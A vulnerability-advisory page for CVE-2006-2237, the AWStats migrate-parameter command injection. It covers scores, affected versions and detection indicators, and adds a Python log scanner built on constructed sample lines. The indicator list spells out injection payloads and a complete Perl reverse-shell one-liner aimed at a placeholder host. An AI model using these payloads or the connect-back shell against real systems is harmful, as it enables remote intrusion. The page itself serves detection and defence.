CVE-2006-2237
published 2006-05-08


Priority: P2 (72), medium
CVSS 2.0: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
VulnCheck KEV: exploited in the wild (ITW exploit)
EPSS: 58.36% (99.0th percentile)
The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter.

Affected

7 ranges listed by the source (identical entries collapsed):

Vendor    Product   Version range                 Fixed in
awstats   awstats   (not specified)               (not specified)
awstats   awstats   >= 0, < 6.5-2                 6.5-2
debian    awstats   < awstats 6.5-2 (bookworm)    awstats 6.5-2 (bookworm)

Detection & IOCs (extracted from sources)

path: /cgi-bin/awstats.pl
command: |echo;cat /etc/hosts;echo|awstats<rand>.demo.txt
command: |cd /tmp/ && <payload>|awstats052005.<host>.txt
command: cd /tmp &&<payload>
url: ?migrate=|echo;echo%20YYY;<command>;echo%20YYY;echo|awstats<rand>.<site>.txt
command: perl -e '$h="<host>";$p=<port>;use Socket;$sp=inet_aton($h);$sa=sockaddr_in($p,$sp);;socket(CLIENT,PF_INET,SOCK_STREAM,getprotobyname("tcp"));gethostbyname($h);connect(CLIENT,$sa);open(STDIN,">&CLIENT");open(STDOUT,">&CLIENT");open(STDERR,">&CLIENT");if(fork()){exec "/bin/sh"; exit(0); };'
path: /tmp/
  • Detect exploitation attempts by alerting on HTTP GET requests to /cgi-bin/awstats.pl whose 'migrate' query parameter contains shell metacharacters (in particular the pipe '|'), especially values of the form |<commands>|awstats<digits>.<site>.txt as sent by the public exploits.
  • Detect probe requests where the migrate parameter contains 'cat /etc/hosts', which the Metasploit module's check() function uses to fingerprint vulnerable targets.
  • The public exploit PoC sends the User-Agent '[BL4CK] Security' and the Referer 'http://exploit.by.redsand.of.blacksecurity.org' in its requests to awstats.pl. Both are cheap to alert on but trivially changed by an attacker, so treat them as corroborating rather than primary indicators.
  • Monitor for outbound Perl-based reverse shell (connect-back) connections from the web server process, particularly a Perl process using the Socket module with the fork + exec /bin/sh pattern shown above.
  • The vulnerability is only exploitable when AllowToUpdateStatsFromBrowser is enabled in the AWStats configuration file, which is not the default. Static AWStats deployments that do not use the web-based update feature are not affected. Audit configurations and restrict access to the update functionality as a hardening measure.
  • Affected versions are AWStats 6.4 and 6.5 only; the fix was introduced in 6.6 (Debian fixed in package version 6.5-2).
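The detection bullets above, applied to access-log lines, as an added example. This is illustration code written for this page, not code from the vulnerability database, the AWStats project, or the exploit authors. The Apache combined-format log lines, IP addresses and the `demo` site name are constructed for the example; the indicator strings (the `|...|awstats<digits>.<site>.txt` shape, the `cat /etc/hosts` probe, the PoC User-Agent and Referer) are the ones listed on this page. The assumption that a benign `migrate` value is a bare history-file name with no metacharacters is the example's, used only to show the false-positive case.

```python
"""Detection example for CVE-2006-2237 (AWStats 'migrate' command injection).

Added illustration, not code from the page or from AWStats: it applies the
page's detection indicators to constructed Apache combined-format log lines.
"""
import re
from urllib.parse import urlsplit, unquote

# Constructed sample log lines; none of this is real traffic.
SAMPLE_LOG = r'''
203.0.113.5 - - [08/May/2006:10:01:02 +0000] "GET /cgi-bin/awstats.pl?config=demo&update=1 HTTP/1.0" 200 4321 "-" "Mozilla/5.0"
203.0.113.9 - - [08/May/2006:10:02:15 +0000] "GET /cgi-bin/awstats.pl?migrate=|echo;cat%20/etc/hosts;echo|awstats052006.demo.txt HTTP/1.0" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [08/May/2006:10:02:40 +0000] "GET /cgi-bin/awstats.pl?migrate=%7Cecho;echo%20YYY;id;echo%20YYY;echo%7Cawstats052006.demo.txt HTTP/1.0" 200 640 "http://exploit.by.redsand.of.blacksecurity.org" "[BL4CK] Security"
203.0.113.12 - - [08/May/2006:10:03:01 +0000] "GET /cgi-bin/awstats.pl?migrate=awstats052006.demo.txt HTTP/1.0" 200 222 "-" "Mozilla/5.0"
'''

# Apache combined log format: ip ident user [ts] "method target proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators taken from the page's IOC list.
POC_SHAPE_RE = re.compile(r'\|.*\|awstats\d+\.[^|]+\.txt$', re.S)  # |cmds|awstats<digits>.<site>.txt
MSF_CHECK_PROBE = 'cat /etc/hosts'
POC_USER_AGENT = '[BL4CK] Security'
POC_REFERER = 'http://exploit.by.redsand.of.blacksecurity.org'
SHELL_META = set('|;&`$')


def parse_query(query):
    """Split a raw query string on '&' only and URL-decode each side.

    Done by hand rather than with urllib.parse.parse_qs so that ';' inside a
    payload is never treated as a parameter separator (older Pythons did so).
    """
    params = {}
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        params.setdefault(unquote(key), []).append(unquote(value))
    return params


def analyze(line):
    """Return the list of indicator names that fire for one log line.

    An empty list means no finding; None means the line did not parse.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    if not parts.path.endswith('/awstats.pl'):
        return []
    findings = []
    for value in parse_query(parts.query).get('migrate', []):
        if SHELL_META & set(value):
            findings.append('shell metacharacter in migrate')
        if POC_SHAPE_RE.search(value):
            findings.append('PoC-style |cmds|awstats<digits>.<site>.txt pattern')
        if MSF_CHECK_PROBE in value:
            findings.append('Metasploit check() probe')
    if m.group('ua') == POC_USER_AGENT:
        findings.append('known PoC User-Agent')
    if m.group('referer') == POC_REFERER:
        findings.append('known PoC Referer')
    return findings


def scan(log_text):
    """Return (source_ip, findings) for every line with at least one finding."""
    hits = []
    for line in log_text.strip().splitlines():
        findings = analyze(line)
        if findings:
            hits.append((line.split()[0], findings))
    return hits


if __name__ == '__main__':
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, '->', '; '.join(findings))
```

The fourth sample line, a plain `migrate=awstats052006.demo.txt` with no metacharacters, produces no finding, which is the distinction worth preserving in a production rule: alert on metacharacters inside the parameter value, not on the presence of the `migrate` parameter itself. Decode the value before matching, since the third line carries its pipes as `%7C`.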

CVSS provenance

Source         Version  Score  Severity  Vector
nvd            v2.0     5.1    MEDIUM    AV:N/AC:H/Au:N/C:P/I:P/A:P
osv            -        5.1    MEDIUM    -
vulncheck      -        5.1    MEDIUM    -
vendor_debian  -        5.1    MEDIUM    -